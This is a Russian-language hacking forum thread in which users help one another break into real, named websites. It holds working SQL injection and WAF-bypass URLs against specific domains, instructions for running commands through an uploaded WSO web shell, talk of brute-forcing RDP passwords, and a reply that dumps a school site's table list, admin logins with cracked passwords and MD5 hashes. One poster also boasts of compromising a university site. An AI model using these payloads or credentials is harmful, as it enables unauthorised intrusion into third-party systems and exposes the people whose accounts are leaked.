Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10

    Вопрос все еще интересен, совет юзера выше не помог :(
    выдает при таком коде вот что:

    Code:
    Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1
     
  2. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    3000 адресов? Как по-вашему, сколько из них будут живы? На скольких из них будет винда? На скольких из них будет открыт rdp? А на скольких будет такой пароль?
     
  3. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    ну их 200, которые я проверил были все живые, но ни к одному пароль не подошел. Можете подсказать словарь с оптимальным соотношением размер/качество. APPS у меня 5.
     
  4. andrxx

    andrxx Banned

    Joined:
    7 Nov 2013
    Messages:
    51
    Likes Received:
    6
    Reputations:
    0
    значит шелл залит успешно.. попробуй: wso2.php?cmd=ls, в ответ получишь список файлов
     
  5. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Господа, помогите раскрутить. С меня - миллион благодарностей в любом эквиваленте.

    Code:
    http://games.onet.ua/index.php?option=com_remository&Itemid=-1&func=;die%28%29;select&id=-1
    
    Я ошибаюсь, или там выполнение кода? Хсс, очевидно. Это, к сожалению, та версия, где еще нет sql в selectcat, исходники этой достать не смог. На том же хосте есть datsogallery, предположительно уязвимая к аплоаду шеллов, но она post-auth, регистрация закрыта, а пасс ни одного из малочисленных юзеров не известен.

    Code:
    http://games.onet.ua/index.php?option=com_banners&task=archivesection&id=0%27+and+%271%27=%271
    
    Предположительно уязвимая к blind sqli версия com_banners, однако проверить не удалось.

    Code:
    http://forum.onet.ua/fckeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php
    
    fckeditor. вроде не позволяет просто так грузить пхп, .htaccess залить также не осилил. могу ошибаться.
    Крутится SMF 2.0 RC-3 на пару с tinyportal 1.0-r1.
     
    #23005 madhatter, 30 Jan 2014
    Last edited: 31 Jan 2014
  6. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Как вывести пароль юзера от бд MSSQL?
     
    #23006 zombak18, 31 Jan 2014
    Last edited: 31 Jan 2014
  7. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    почитай, будет полезно
    https://forum.antichat.ru/thread30501.html
     
  8. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    зашел на школьный сайт младшей сестры. нашел скулю.. думал что это blind sql.. но видимо ошибся. Опыт в эксплутации веб - дыр маленький. Прошу совета.. что можно сделать с этой скулей..как хотябы узнать количество таблиц?? потому что все мои запросы скулька игнорит.

     
  9. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    562
    Likes Received:
    50
    Reputations:
    54
    Итак, отвечу еще раз. Скуля is not so blind. Она в редиректе, интересный случай.

    Таблички:
    Code:
    g8s_2class
    g8s_2discipline
    g8s_2mark
    g8s_2pupil
    g8s_a_admin
    g8s_a_conf
    g8s_a_menu
    g8s_a_page
    g8s_article
    g8s_block
    g8s_class
    g8s_classhistory
    g8s_download
    g8s_graduate
    g8s_guestbook
    g8s_letter
    g8s_menu
    g8s_news
    g8s_newspicture
    g8s_pha_picture
    g8s_photoalbum
    g8s_picture
    g8s_pupil
    g8s_qa
    g8s_timetable
    g8s_user
    g8s_user2
    g8s_v_answer
    g8s_v_poll
    g8s_v_question
    
    Логин:пасс от админки:
    Code:
    1                (1)
    5                (5)
    SV               (Dubikova)
    zx12             (megaadmin)
    23091975         (admin)
    354000           (Director)
    
    Хеши:
    Code:
    admin:4e083bb0bb327b00362f717e42d24f8e
    5:e4da3b7fbbce2345d7772b0674a318d5
    1:c4ca4238a0b923820dcc509a6f75849b
    Dubikova:d38212a0c0e98f678feaaa5a8b9167f5
    psy:0af3a5cd53f0ddc6bfd706229be937d1
    rde:c2d216144060d7b2b3a08364e50cfa99
    Director:0b7f85ee5ac5939661a6517d1a53737a
    megaadmin:3b94f9bb839a88ea045b5dc2b77722ad
    
    Сама админка где-то в /admin/, развлекайся, в запросе две колонки.
    UPD: и да, там еще где-то валяется fckeditor, возможно бажный.
     
    #23009 madhatter, 3 Feb 2014
    Last edited: 3 Feb 2014
  10. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Тут похожу уязвиость не в cms а в плагине remository
    Это подтверждает
    http://games.onet.ua/index.php?option=com_remository&Itemid=32&func=select&id=0
    http://games.onet.ua/components/com_remository/language/

    Полазил в сорцах - нигде не слова о версии...
    Хз вобщем чем тебе помочь...
    Вот единственное что нагуглил но тут скорее всего версия посвежее
    http://archives.neohapsis.com/archives/bugtraq/2004-09/0249.html
     
    1 person likes this.
  11. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12

    Спасибо большое)) но вопрос немного в другом заключался.. Я хочу понять как выводить из этой скули информацию.. Т.к она явно отличается от других.. Как выбить нужную информацию без софта?! На мои запросы у скули реакции нет.
     
  12. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Уязвимый параметр year:
    5.1.70-log

    Далее на пути стоит sweb, обходите путем изменения регистра.
     
  13. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    295
    Likes Received:
    136
    Reputations:
    29
    Фильтруется from

    Такой запрос проходит -1%27+/*!union*/+SeLect+1/*!,*/version%28%29/*!,*/3/*!,*/4+--+

    Такой не проходит -1%27+/*!union*/+SeLect+1/*!,*/password/*!,*/3/*!,*/4+/*!FrOm*/+--+

    Как можно обойти фильтр ?
     
  14. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    1. FRFROMOM
    2. POST
    2. From находится в связке с union, select, пробелом и т.д.
     
  15. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    Тьфу, ёпрст, я уж думал это вопрос :D Ну а раз нет ссылки погуглил, нашел и крутанул сайт
    Code:
    Красноярский государственный медицинский университет - Клуб выпускников

    ...бывает)))

    П.С. Извиняюсь за офф.топ
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    а я как раз думал, кто его похекал... но теперь и логи есть и IP и признание хацкера на форуме, пора подшивать дело!))) начальство и прокуратура будет довольна :D

    да, не... молодец, все норм)))
     
    _________________________
  17. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    207
    Likes Received:
    46
    Reputations:
    33
    :D
    Админам на почту отписал так что не надо ля-ля... :D ;)
     
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    http://www.sailorjob.com.ua/show_firm/?id=482+order+by+1+--+
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    373
    Likes Received:
    164
    Reputations:
    126
    Что с этим сделать надо?
    Если раскрутить, то вот.
    http://www.sailorjob.com.ua/show_firm/?id=482%27and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+g
     
    _________________________
  20. Shade

    Shade Member

    Joined:
    8 Sep 2010
    Messages:
    37
    Likes Received:
    10
    Reputations:
    12
    Почему не выводит имя таблиц(ы)?

    Code:
    www.crew4sea.com/indexm-ru.php?country=-209+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
     
Loading...
Thread Status:
Not open for further replies.